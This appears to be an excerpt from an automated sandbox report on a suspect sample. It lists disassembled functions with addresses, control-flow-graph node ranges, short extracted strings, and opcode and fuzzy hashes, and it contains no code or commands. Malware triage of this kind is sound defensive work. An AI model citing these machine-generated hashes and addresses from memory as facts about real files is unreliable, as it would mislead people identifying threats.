                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8M%$8M%
                                              • API String ID: 0-2363288293
                                              • Opcode ID: e29be12a58054d71723dccb697db93177e6f3a9b02b256eb4156d76ef89bba69
                                              • Instruction ID: face8cc57321d2a840b4ebf1c895ba86b14fcce1c3bbec7f5c82c038ab2c303f
                                              • Opcode Fuzzy Hash: e29be12a58054d71723dccb697db93177e6f3a9b02b256eb4156d76ef89bba69
                                              • Instruction Fuzzy Hash: B872A270A1DA898FEB45EF28C450BA57BE1EF5A340F1442EAE01DC72D3CE68E845C791
                                              Function 00007FFAACCF9390 Relevance: 3.1, Strings: 2, Instructions: 613COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2497 7ffaaccf9390-7ffaaccfb14a 2499 7ffaaccfb1a6-7ffaaccfb1aa 2497->2499 2500 7ffaaccfb14c-7ffaaccfb15c 2497->2500 2503 7ffaaccfb1ee-7ffaaccfb1f2 2499->2503 2504 7ffaaccfb1ac-7ffaaccfb1b7 2499->2504 2501 7ffaaccfb166-7ffaaccfb1a0 2500->2501 2502 7ffaaccfb15e-7ffaaccfb161 2500->2502 2501->2499 2527 7ffaaccfb5ff-7ffaaccfb607 2501->2527 2505 7ffaaccfb631-7ffaaccfb673 2502->2505 2506 7ffaaccfb227-7ffaaccfb22b 2503->2506 2507 7ffaaccfb1f4-7ffaaccfb226 call 7ffaacce77e0 2503->2507 2514 7ffaaccfb1b9-7ffaaccfb1d3 2504->2514 2515 7ffaaccfb1d7-7ffaaccfb1e7 call 7ffaacce0408 2504->2515 2512 7ffaaccfb22d-7ffaaccfb252 2506->2512 2513 7ffaaccfb29a-7ffaaccfb2bb 2506->2513 2507->2506 2518 7ffaaccfb2c2-7ffaaccfb2d3 2512->2518 2528 7ffaaccfb254-7ffaaccfb277 2512->2528 2513->2518 2514->2515 2529 7ffaaccfb1ed 2515->2529 2521 7ffaaccfb2d5 2518->2521 2522 7ffaaccfb2da-7ffaaccfb342 call 7ffaaccfb674 call 7ffaaccfb6cb call 7ffaaccf5690 2518->2522 2521->2522 2544 7ffaaccfb399-7ffaaccfb3bb 2522->2544 2545 7ffaaccfb344-7ffaaccfb392 call 7ffaaccf6cc0 2522->2545 2530 7ffaaccfb609-7ffaaccfb62c 2527->2530 2531 7ffaaccfb62e-7ffaaccfb62f 2527->2531 2536 7ffaaccfb279-7ffaaccfb294 2528->2536 2529->2503 2530->2505 2531->2505 2536->2513 2547 7ffaaccfb483-7ffaaccfb4a5 2544->2547 2548 7ffaaccfb3c1-7ffaaccfb3f6 2544->2548 2545->2544 2551 7ffaaccfb56f-7ffaaccfb575 2547->2551 2552 7ffaaccfb4ab-7ffaaccfb4bb 2547->2552 2568 7ffaaccfb3f8-7ffaaccfb41b 2548->2568 2569 7ffaaccfb442-7ffaaccfb44a 2548->2569 2554 7ffaaccfb577-7ffaaccfb5ed call 7ffaacce1e60 call 7ffaacce1800 call 7ffaaccf3288 2551->2554 2558 7ffaaccfb4bc 2552->2558 2596 7ffaaccfb5f2-7ffaaccfb5fe 2554->2596 2562 7ffaaccfb506-7ffaaccfb52a 2558->2562 2563 7ffaaccfb4bd-7ffaaccfb4e0 2558->2563 2579 7ffaaccfb52c-7ffaaccfb559 call 7ffaaccf16b0 2562->2579 2578 7ffaaccfb4e2-7ffaaccfb505 2563->2578 2563->2579 2568->2569 2569->2558 2574 7ffaaccfb44c-7ffaaccfb47c call 7ffaaccf16b0 2569->2574 2574->2547 2578->2562 2579->2554 2594 7ffaaccfb55b-7ffaaccfb568 2579->2594 2594->2551 2596->2527
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8M%$qU_H
                                              • API String ID: 0-905428570
                                              • Opcode ID: 7cb048c9b37bccfecff02d9e1c041b1cbec2a7da8d6d4f7025cf770b69349d29
                                              • Instruction ID: 1d5e3092abad52e97cc7235599e822f975ceee6e12d5d449bd3bfe4987c23fd9
                                              • Opcode Fuzzy Hash: 7cb048c9b37bccfecff02d9e1c041b1cbec2a7da8d6d4f7025cf770b69349d29
                                              • Instruction Fuzzy Hash: 81120671A19B4A8FEB89DF28846567977E1EF5A304F1481BAD00EC7293DE34E846C7C1
                                              Function 00007FFAACCE7228 Relevance: 2.3, Strings: 1, Instructions: 1016COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3112 7ffaacce7228-7ffaaccf064b 3114 7ffaaccf0695-7ffaaccf06a5 3112->3114 3115 7ffaaccf064d-7ffaaccf0669 3112->3115 3117 7ffaaccf06c2-7ffaaccf06cc 3114->3117 3115->3117 3118 7ffaaccf066b-7ffaaccf066e 3115->3118 3119 7ffaaccf0716 3117->3119 3120 7ffaaccf06ce-7ffaaccf06ed 3117->3120 3121 7ffaaccf0670-7ffaaccf068c call 7ffaaccef0b8 3118->3121 3122 7ffaaccf06ef-7ffaaccf06f9 3118->3122 3124 7ffaaccf0758-7ffaaccf075b 3119->3124 3125 7ffaaccf0718-7ffaaccf071b 3119->3125 3120->3122 3135 7ffaaccf0691-7ffaaccf06a5 3121->3135 3127 7ffaaccf0752-7ffaaccf075b 3122->3127 3128 7ffaaccf06fb-7ffaaccf06fe 3122->3128 3131 7ffaaccf07a5-7ffaaccf07eb 3124->3131 3132 7ffaaccf075d-7ffaaccf077d 3124->3132 3133 7ffaaccf079c-7ffaaccf079d 3125->3133 3134 7ffaaccf071d-7ffaaccf0731 3125->3134 3127->3131 3127->3132 3129 7ffaaccf0700-7ffaaccf0702 3128->3129 3130 7ffaaccf077f-7ffaaccf0782 3128->3130 3136 7ffaaccf0704 3129->3136 3137 7ffaaccf077e 3129->3137 3138 7ffaaccf0784-7ffaaccf0789 3130->3138 3147 7ffaaccf0808-7ffaaccf08a2 3131->3147 3148 7ffaaccf07ed-7ffaaccf0806 3131->3148 3139 7ffaaccf07a0-7ffaaccf07a3 3133->3139 3140 7ffaaccf079f 3133->3140 3163 7ffaaccf0738-7ffaaccf073b call 7ffaaccef060 3134->3163 3143 7ffaaccf0746-7ffaaccf074b 3136->3143 3144 7ffaaccf0706-7ffaaccf0708 3136->3144 3137->3130 3145 7ffaaccf078a-7ffaaccf078b 3138->3145 3139->3131 3140->3139 3150 7ffaaccf074c-7ffaaccf0751 3143->3150 3144->3138 3152 7ffaaccf070a 3144->3152 3153 7ffaaccf078e 3145->3153 3154 7ffaaccf078d 3145->3154 3172 7ffaaccf08a4-7ffaaccf08be 3147->3172 3148->3147 3152->3150 3155 7ffaaccf070c-7ffaaccf070e 3152->3155 3156 7ffaaccf0790-7ffaaccf079a 3153->3156 3154->3153 3155->3145 3160 7ffaaccf0710 3155->3160 3156->3133 3160->3127 3162 7ffaaccf0712-7ffaaccf0714 3160->3162 3162->3119 3162->3156 3165 7ffaaccf0740-7ffaaccf0751 call 7ffaaccf0752 3163->3165 3173 7ffaaccf08c8-7ffaaccf0965 3172->3173 3182 7ffaaccf0f1b-7ffaaccf0f44 3173->3182 3183 7ffaaccf096b-7ffaaccf09a7 3173->3183 3186 7ffaaccf0f4b-7ffaaccf0f5c 3182->3186 3191 7ffaaccf09a9-7ffaaccf09e6 3183->3191 3192 7ffaaccf0a16-7ffaaccf0a27 3183->3192 3188 7ffaaccf0f64-7ffaaccf0faa 3186->3188 3189 7ffaaccf0f5e-7ffaaccf0f63 3186->3189 3193 7ffaaccf0fb1-7ffaaccf0fba 3188->3193 3189->3188 3191->3192 3195 7ffaaccf0a29 3192->3195 3196 7ffaaccf0a2e-7ffaaccf0a5e 3192->3196 3195->3196 3200 7ffaaccf0ea7-7ffaaccf0ed1 3196->3200 3201 7ffaaccf0a64-7ffaaccf0a76 3196->3201 3200->3186 3209 7ffaaccf0ed3-7ffaaccf0f0d call 7ffaaccef208 3200->3209 3202 7ffaaccf0a7c-7ffaaccf0a92 3201->3202 3203 7ffaaccf0e5a 3201->3203 3206 7ffaaccf0a99-7ffaaccf0aab 3202->3206 3204 7ffaaccf0e5f-7ffaaccf0e78 3203->3204 3207 7ffaaccf0b53-7ffaaccf0b65 3204->3207 3208 7ffaaccf0e7e-7ffaaccf0ea1 3204->3208 3211 7ffaaccf0afe-7ffaaccf0b1a 3206->3211 3212 7ffaaccf0aad-7ffaaccf0ab8 3206->3212 3207->3203 3210 7ffaaccf0b6b-7ffaaccf0b77 3207->3210 3208->3200 3208->3201 3209->3193 3214 7ffaaccf0b79-7ffaaccf0b80 3210->3214 3215 7ffaaccf0bbb-7ffaaccf0bbf 3210->3215 3232 7ffaaccf0b1c-7ffaaccf0b2b 3211->3232 3220 7ffaaccf0ad4-7ffaaccf0ae8 3212->3220 3221 7ffaaccf0aba-7ffaaccf0ad2 3212->3221 3219 7ffaaccf0b82-7ffaaccf0ba5 call 7ffaacce0408 3214->3219 3222 7ffaaccf0bf4-7ffaaccf0bf8 3215->3222 3223 7ffaaccf0bc1-7ffaaccf0bf3 call 7ffaacce77e0 3215->3223 3234 7ffaaccf0baa-7ffaaccf0bba 3219->3234 3239 7ffaaccf0aea-7ffaaccf0afc 3220->3239 3229 7ffaaccf0ad8-7ffaaccf0ae8 3221->3229 3230 7ffaaccf0f12-7ffaaccf0f1a 3221->3230 3225 7ffaaccf0c6f-7ffaaccf0c91 3222->3225 3226 7ffaaccf0bfa-7ffaaccf0c1f 3222->3226 3223->3222 3235 7ffaaccf0c98-7ffaaccf0cab 3225->3235 3226->3235 3246 7ffaaccf0c21-7ffaaccf0c6d 3226->3246 3229->3239 3230->3182 3237 7ffaaccf0b32-7ffaaccf0b4d 3232->3237 3234->3215 3241 7ffaaccf0ce9-7ffaaccf0d42 call 7ffaaccf0fbb call 7ffaaccf1008 3235->3241 3242 7ffaaccf0cad-7ffaaccf0cb6 3235->3242 3237->3207 3237->3208 3239->3211 3241->3204 3261 7ffaaccf0d48-7ffaaccf0d8d 3241->3261 3248 7ffaaccf0cc8-7ffaaccf0cdf 3242->3248 3249 7ffaaccf0cb8-7ffaaccf0cbe 3242->3249 3246->3225 3248->3241 3255 7ffaaccf0ce1-7ffaaccf0ce2 3248->3255 3249->3248 3255->3241 3265 7ffaaccf0d8f-7ffaaccf0d9a 3261->3265 3266 7ffaaccf0e50-7ffaaccf0e58 call 7ffaaccf1055 3265->3266 3267 7ffaaccf0da0-7ffaaccf0dbf 3265->3267 3266->3204 3270 7ffaaccf0dd8-7ffaaccf0e01 3267->3270 3271 7ffaaccf0dc1-7ffaaccf0dce 3267->3271 3278 7ffaaccf0e32-7ffaaccf0e4a 3270->3278 3279 7ffaaccf0e03-7ffaaccf0e2b call 7ffaacce7258 3270->3279 3271->3270 3274 7ffaaccf0dd0-7ffaaccf0dd6 3271->3274 3274->3270 3278->3266 3278->3267 3279->3278
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8M%
                                              • API String ID: 0-1690249272
                                              • Opcode ID: 6a756d8d003ef9229dbef8678b1ed11d1a01980a00dc26030953aa88ef20166c
                                              • Instruction ID: 35c1c1e357c2dbc81bc79be569fae2be41f69d63de8456b905e49a319b078838
                                              • Opcode Fuzzy Hash: 6a756d8d003ef9229dbef8678b1ed11d1a01980a00dc26030953aa88ef20166c
                                              • Instruction Fuzzy Hash: 0872D471A19B4A8FEB84EF28C454AA977E1FF99304F1485A9D41DC7296CE34EC46CBC0
                                              Function 00007FFAACCF3218 Relevance: 1.8, Strings: 1, Instructions: 544COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8M%
                                              • API String ID: 0-1690249272
                                              • Opcode ID: 82b6066c5aadb7cee5787b1278792a04c7f33f1c0839315d866ac255c4df92e0
                                              • Instruction ID: fcf5300cdd3fc11c8ae696d8729dced64e73a16b3838568dee1b7f65c0f76fd2
                                              • Opcode Fuzzy Hash: 82b6066c5aadb7cee5787b1278792a04c7f33f1c0839315d866ac255c4df92e0
                                              • Instruction Fuzzy Hash: D302C271A19B4A8FEB89DF28846467577E2FF9A304F1481AAD01EC72D2DE34E845C7C1
                                              Function 00007FFAACEB6568 Relevance: 1.6, Instructions: 1626COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1916604695.00007FFAACEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACEA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacea0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a369117f643c614c4cecb418782ce78954e60915e73ca2b33f6c35689e1d192b
                                              • Instruction ID: 4d2ee26439a03883acd9657fd9774ef545341d07e861dbc7981fa4f9df99253b
                                              • Opcode Fuzzy Hash: a369117f643c614c4cecb418782ce78954e60915e73ca2b33f6c35689e1d192b
                                              • Instruction Fuzzy Hash: 4EB2C5B1A1DB858FEB5D9B3884656707BE1EF5A300B1880FAD01ECB6D3DD24DC498792
                                              Function 00007FFAACCF8C28 Relevance: 1.4, Instructions: 1358COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8b37e6fdad76b8ffe89b5678c33fead53579391535762ebd4262bb8a344d06bc
                                              • Instruction ID: c1a1474e690415431e215663ac98deeeb3add880f84ebcb339cda90f8a5d9773
                                              • Opcode Fuzzy Hash: 8b37e6fdad76b8ffe89b5678c33fead53579391535762ebd4262bb8a344d06bc
                                              • Instruction Fuzzy Hash: A2A26F7071DA498FE7A8DB18C485BA6B7E1FFA9304F10856DD09EC7291DF34E8458B82
                                              Function 00007FFAACEB8912 Relevance: 1.3, Instructions: 1270COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1916604695.00007FFAACEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACEA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacea0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4d9fe05d70571b3080d87856d0e0d0d6b5cd5c0a4e46509ba5169b5c149b268d
                                              • Instruction ID: 4ae7cead65b0f3c4da1b582d116de8a0850ad9d2339b151eff47908ed9c33bb8
                                              • Opcode Fuzzy Hash: 4d9fe05d70571b3080d87856d0e0d0d6b5cd5c0a4e46509ba5169b5c149b268d
                                              • Instruction Fuzzy Hash: BAA2A470919A4ACFEB98EF28C455AA973F1FF59300F5085A9D41EC7296CF35E846CB80
                                              Function 00007FFAACD347B0 Relevance: .7, Instructions: 746COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b63206dee2a805601527b0ad67d207a3a715a0e58734e81f77f23ae2b57b8e9
                                              • Instruction ID: c0486dc36cd7f476e69241f01dec1ecff8a03b2891a7e99d98d61a3cd984d6f0
                                              • Opcode Fuzzy Hash: 3b63206dee2a805601527b0ad67d207a3a715a0e58734e81f77f23ae2b57b8e9
                                              • Instruction Fuzzy Hash: 3B329170618E06CFEB98EB18C085A75B3E1FFA9304B5585ADD06EC3696DF24F846C781
                                              Function 00007FFAACCF89A0 Relevance: .7, Instructions: 671COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5c741dfae2cc712f80ce8c8e661fcd8942ada60112de4937389c2c8a0bc65100
                                              • Instruction ID: b7a6b6fc2e4f823d07f0f27b1738a3237201a534b388a775e94d70120525767d
                                              • Opcode Fuzzy Hash: 5c741dfae2cc712f80ce8c8e661fcd8942ada60112de4937389c2c8a0bc65100
                                              • Instruction Fuzzy Hash: 5012D271B1DA458BF798AB28945667573D1EF9A300F44817DE05EC72C2DF28F80A87C2
                                              Function 00007FFAACEB5245 Relevance: .7, Instructions: 670COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1916604695.00007FFAACEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACEA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacea0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3b5898d0e2d4114e04a64cfd15ef08af60abe711407db4faa9b8239ada3dae9
                                              • Instruction ID: f21e27b0c3934b96b5360a7cc4f31d49744bd2aa76be30816708835e14c5a42d
                                              • Opcode Fuzzy Hash: a3b5898d0e2d4114e04a64cfd15ef08af60abe711407db4faa9b8239ada3dae9
                                              • Instruction Fuzzy Hash: 0722C371A19A4D8FDF98EF28C4556B977E2FF99300F1081A9D01ED7296DE34E846C780
                                              Function 00007FFAACEAE28E Relevance: .6, Instructions: 641COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1916604695.00007FFAACEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACEA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacea0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 754e8a02f1f67fa9f1a89f2037b42fd86e5cbd25ad9db0139f857994a7edc51e
                                              • Instruction ID: 115add6b3695f69e054fabb665f3dc5ed3d8a887e4b44d7e18bab02da0bb05f4
                                              • Opcode Fuzzy Hash: 754e8a02f1f67fa9f1a89f2037b42fd86e5cbd25ad9db0139f857994a7edc51e
                                              • Instruction Fuzzy Hash: 19124A71A0DA898FEB55EB3888156F97BE1EF87311F0440BAD05DD72D3DD28A81AC781
                                              Function 00007FFAACD34738 Relevance: .6, Instructions: 604COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f8a963f5f54236f4244f9c2a7b5401fc565d041d626147ccad0e85e2e98dcfc
                                              • Instruction ID: cf77c48b08d6e14dd0d00b653e664cb078e7dcddad541e3f62e03c39b3e7dfc3
                                              • Opcode Fuzzy Hash: 7f8a963f5f54236f4244f9c2a7b5401fc565d041d626147ccad0e85e2e98dcfc
                                              • Instruction Fuzzy Hash: A4223D70A19A098FEF98DB18C499BB9B7E1EF59300F5085B9D45EC3291DF34E885CB81
                                              Function 00007FFAACEB0230 Relevance: .5, Instructions: 507COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1916604695.00007FFAACEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACEA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacea0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1db0e13caa62f24064b4a44fe191c9d2b4b92f6fe8616f20f1284604b8cf3a2
                                              • Instruction ID: c861db93fe4dd092f400bbc332025c9b835d075a97e1967ad9389b870d897f5c
                                              • Opcode Fuzzy Hash: b1db0e13caa62f24064b4a44fe191c9d2b4b92f6fe8616f20f1284604b8cf3a2
                                              • Instruction Fuzzy Hash: C7E1D4B1A19A598FF7A8EB2C94556B877D1EF89310F04C1BAD40ED32D3CE28E84587C1
                                              Function 00007FFAACCF1600 Relevance: 4.3, Strings: 3, Instructions: 575COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 574 7ffaaccf1600-7ffaacd0311a 576 7ffaacd03120-7ffaacd03126 574->576 577 7ffaacd031ba-7ffaacd031dc 574->577 576->577 579 7ffaacd0312c-7ffaacd03132 576->579 583 7ffaacd0324f-7ffaacd03298 577->583 584 7ffaacd031de-7ffaacd031f4 577->584 581 7ffaacd03134-7ffaacd0313a 579->581 582 7ffaacd03140-7ffaacd03146 579->582 581->582 585 7ffaacd0320d-7ffaacd03244 581->585 586 7ffaacd03148-7ffaacd0315f call 7ffaacce03d8 582->586 587 7ffaacd03160-7ffaacd031b9 call 7ffaaccf50b0 582->587 599 7ffaacd03299-7ffaacd032a1 583->599 593 7ffaacd03246-7ffaacd03247 584->593 594 7ffaacd031f6-7ffaacd03206 584->594 585->593 593->599 600 7ffaacd03249-7ffaacd0324e 593->600 594->585 602 7ffaacd032a7-7ffaacd032b5 599->602 603 7ffaacd032a3-7ffaacd032a4 599->603 600->583 609 7ffaacd032b7-7ffaacd032cc 602->609 610 7ffaacd032ce-7ffaacd032e0 602->610 603->602 609->610 613 7ffaacd032e2-7ffaacd032fb 610->613 614 7ffaacd0330d-7ffaacd03314 610->614 618 7ffaacd03308 613->618 619 7ffaacd032fd-7ffaacd03306 613->619 616 7ffaacd03316-7ffaacd03329 614->616 617 7ffaacd0332b-7ffaacd03344 614->617 616->617 625 7ffaacd03346-7ffaacd0335e 617->625 626 7ffaacd033a3-7ffaacd033b5 617->626 621 7ffaacd036c6-7ffaacd036d5 618->621 619->618 629 7ffaacd03360-7ffaacd03378 625->629 630 7ffaacd0337a-7ffaacd0337b 625->630 632 7ffaacd034e0-7ffaacd034f2 626->632 633 7ffaacd033bb-7ffaacd033e0 626->633 629->630 634 7ffaacd03382-7ffaacd0338b 630->634 642 7ffaacd034f8-7ffaacd03510 632->642 643 7ffaacd036a0-7ffaacd036a7 632->643 633->632 646 7ffaacd033e6-7ffaacd033fa 633->646 637 7ffaacd0339e 634->637 638 7ffaacd0338d-7ffaacd03391 634->638 637->621 638->637 641 7ffaacd03393-7ffaacd0339c 638->641 641->637 642->643 657 7ffaacd03516-7ffaacd0352b 642->657 644 7ffaacd036a9-7ffaacd036bc 643->644 645 7ffaacd036be-7ffaacd036c4 643->645 644->645 645->621 652 7ffaacd036d6-7ffaacd037ca 646->652 653 7ffaacd03400-7ffaacd0340a 646->653 655 7ffaacd03424-7ffaacd03481 653->655 656 7ffaacd0340c-7ffaacd03422 653->656 655->632 671 7ffaacd03483-7ffaacd0348c 655->671 656->655 657->643 671->632
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0p%$I_L$t%
                                              • API String ID: 0-4271908741
                                              • Opcode ID: 918597941ea00225b53c6ef76348e64e81161343656763b903f534c0ea55b1ca
                                              • Instruction ID: 89880f1500d939bc2653ee9285c76d5a93a72b9ffbaef09fa2b77b486f66f53a
                                              • Opcode Fuzzy Hash: 918597941ea00225b53c6ef76348e64e81161343656763b903f534c0ea55b1ca
                                              • Instruction Fuzzy Hash: CDF14661B1DA4A9FE7D8E72C98597B537C1EF9A310B4441BAD40EC7293DE18ED0983C1
                                              Function 00007FFAACCEBBFD Relevance: 4.1, Strings: 1, Instructions: 2882COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: aK_H
                                              • API String ID: 0-2603984226
                                              • Opcode ID: 67909e24468d87715f97d30717921df7fe56a790f34e142401a7e9315b87adfd
                                              • Instruction ID: d5dd08e043fff8400ddeac5c5c6840dd75c2b494b26d0b940668b33b5f04eb53
                                              • Opcode Fuzzy Hash: 67909e24468d87715f97d30717921df7fe56a790f34e142401a7e9315b87adfd
                                              • Instruction Fuzzy Hash: 19232D70608A4A8FEB85EF28C494BA977E1FF5A340F1445B9D41DCB297DE34E886CB41
                                              Function 00007FFAACCE9A69 Relevance: 3.2, Strings: 1, Instructions: 1917COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H
                                              • API String ID: 0-2852464175
                                              • Opcode ID: a9d0fdd070de85871586f8e8f4957f12d86e07eecc4db63be524fdbc11eb336d
                                              • Instruction ID: 60ca01f40a24005db7d3213fbe4c20b606c9a7817cb89c45573ff144395a1e49
                                              • Opcode Fuzzy Hash: a9d0fdd070de85871586f8e8f4957f12d86e07eecc4db63be524fdbc11eb336d
                                              • Instruction Fuzzy Hash: 4BE27070A18A4A8FEB85EF28C495BA9B7E1FF5A300F5481B9D01DC7296DF34E845C781
                                              Function 00007FFAACCF09EB Relevance: 3.0, Strings: 2, Instructions: 539COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2598 7ffaaccf09eb-7ffaaccf09f5 2599 7ffaaccf09f7-7ffaaccf0a27 2598->2599 2600 7ffaaccf0a3f-7ffaaccf0a5e 2598->2600 2606 7ffaaccf0a29 2599->2606 2607 7ffaaccf0a2e-7ffaaccf0a3b 2599->2607 2601 7ffaaccf0ea7-7ffaaccf0ed1 2600->2601 2602 7ffaaccf0a64-7ffaaccf0a76 2600->2602 2613 7ffaaccf0ed3-7ffaaccf0f0d call 7ffaaccef208 2601->2613 2614 7ffaaccf0f4b-7ffaaccf0f5c 2601->2614 2604 7ffaaccf0a7c-7ffaaccf0a92 2602->2604 2605 7ffaaccf0e5a 2602->2605 2610 7ffaaccf0a99-7ffaaccf0aab 2604->2610 2608 7ffaaccf0e5f-7ffaaccf0e78 2605->2608 2606->2607 2607->2600 2611 7ffaaccf0b53-7ffaaccf0b65 2608->2611 2612 7ffaaccf0e7e-7ffaaccf0ea1 2608->2612 2618 7ffaaccf0afe-7ffaaccf0b1a 2610->2618 2619 7ffaaccf0aad-7ffaaccf0ab8 2610->2619 2611->2605 2615 7ffaaccf0b6b-7ffaaccf0b77 2611->2615 2612->2601 2612->2602 2624 7ffaaccf0fb1-7ffaaccf0fba 2613->2624 2616 7ffaaccf0f64-7ffaaccf0faa 2614->2616 2617 7ffaaccf0f5e-7ffaaccf0f63 2614->2617 2621 7ffaaccf0b79-7ffaaccf0b80 2615->2621 2622 7ffaaccf0bbb-7ffaaccf0bbf 2615->2622 2616->2624 2617->2616 2641 7ffaaccf0b1c-7ffaaccf0b2b 2618->2641 2629 7ffaaccf0ad4-7ffaaccf0ae8 2619->2629 2630 7ffaaccf0aba-7ffaaccf0ad2 2619->2630 2627 7ffaaccf0b82-7ffaaccf0ba5 call 7ffaacce0408 2621->2627 2631 7ffaaccf0bf4-7ffaaccf0bf8 2622->2631 2632 7ffaaccf0bc1-7ffaaccf0bf3 call 7ffaacce77e0 2622->2632 2643 7ffaaccf0baa-7ffaaccf0bba 2627->2643 2648 7ffaaccf0aea-7ffaaccf0afc 2629->2648 2638 7ffaaccf0ad8-7ffaaccf0ae8 2630->2638 2639 7ffaaccf0f12-7ffaaccf0f44 2630->2639 2634 7ffaaccf0c6f-7ffaaccf0c91 2631->2634 2635 7ffaaccf0bfa-7ffaaccf0c1f 2631->2635 2632->2631 